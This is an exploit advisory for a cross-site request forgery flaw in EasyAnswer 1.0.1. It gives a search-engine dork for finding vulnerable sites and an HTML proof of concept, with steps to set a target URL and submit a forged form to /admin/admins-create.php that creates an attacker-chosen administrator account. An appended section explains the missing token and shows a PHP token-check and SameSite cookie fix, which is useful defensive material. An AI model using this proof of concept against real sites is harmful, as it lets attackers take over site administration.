====================================================================================================
| # Title     : EasyAnswer version 1.0.1 CSRF Vulnerability
| # Author    : indoushka
| # Tested on : Windows 10 Français V.(Pro) / browser : Mozilla Firefox 114.0.1 (64-bit)
| # Vendor    : https://www.codester.com/items/40311/
| # Dork      : "© 2022 Easy Answer All rights reserved."
====================================================================================================

poc :

[+] Infected file: admins-create.php
[+] Inside folder /admin/admins-create.php
[+] Dorking in Google or other search engine.
[+] Copy the code below and paste it into an HTML file.
[+] Go to line 17.
[+] Set the target site link, save changes and apply.

</i>Create Administrator</h2>
</div>
</div>
</div>
</div>
</div>
<div class="row">
  <div class="col-md-12 stretch-card">
    <div class="card">
      <div class="card-body">
        <div id="messages">
        </div>
        <form action="http://CHANGE_TARGET.com/admin/admins-create.php" method="post" id="main_form" name="main_form" enctype="multipart/form-data">
          <input type="hidden" id="submitform" name="submitform" value="1">
          <div class="form-group row">
            <label for="username" class="col-sm-2 col-form-label">Username:</label>
            <div class="col-sm-12">
              <input type="text" class="form-control" id="username" name="username" value="" placeholder="ADMIN USERNAME">
            </div>
          </div>
          <div class="form-group row">
            <label for="password" class="col-sm-2 col-form-label">Password:</label>
            <div class="col-sm-12">
              <input type="password" class="form-control" id="password" name="password" value="" placeholder="ADMIN PASSWORD">
            </div>
          </div>
          <div class="form-group row">
            <label for="email" class="col-sm-2 col-form-label">E-Mail:</label>
            <div class="col-sm-12">
              <input type="email" class="form-control" id="email" name="email" value="" placeholder="ADMIN E-MAIL ADDRESS">
            </div>
          </div>
          <div class="row-spaces"></div>
          <p>
            <button type="button" class="btn btn-primary btn-col-light me-2" onclick="document.main_form.submit();" style=""><span>Submit</span></button>
          </p>
        </form>
      </div>
    </div>
  </div>
</div>
</div>

Greetings to :
====================================================================================================
jericho * Larry W. Cashdollar * brutelogic * hyp3rlinx * 9aylas * shadow_00715 * LiquidWorm * moncet
====================================================================================================
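
The form above carries only the fields submitform, username, password and email, with no per-session secret, so the handler cannot tell a request from its own admin page apart from one submitted by a page on another origin. The following is an added example of a synchronizer-token check for a handler like /admin/admins-create.php; it is not the vendor's code, and the helper names csrf_token() and csrf_verify(), the csrf_token field and the handler layout are assumptions.

```php
<?php
// Added example: hypothetical hardening for a handler like admin/admins-create.php.
// Helper names and the csrf_token field are assumptions, not the vendor's code.

// Keep the session cookie off cross-site requests and away from page scripts.
session_set_cookie_params([
    'httponly' => true,
    'samesite' => 'Strict',
    'secure'   => !empty($_SERVER['HTTPS']),
]);
session_start();

// Return the per-session token, creating it on first use.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison of the submitted token with the session copy.
function csrf_verify(): bool
{
    $sent  = $_POST['csrf_token'] ?? '';
    $known = $_SESSION['csrf_token'] ?? '';
    return is_string($sent) && $known !== '' && hash_equals($known, $sent);
}

if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST' && ($_POST['submitform'] ?? '') === '1') {
    if (!csrf_verify()) {
        // A form hosted on another origin cannot read the token, so it stops here.
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
    // Token is valid: the existing admin-session check and account creation run from here.
}
?>
<form action="admins-create.php" method="post" id="main_form" name="main_form">
    <input type="hidden" name="submitform" value="1">
    <input type="hidden" name="csrf_token"
           value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES) ?>">
    <!-- username, password and email inputs as in the original form -->
</form>
```

The SameSite=Strict session cookie is a second layer; the token check is what rejects the request when an older browser or a same-site subdomain still sends the cookie.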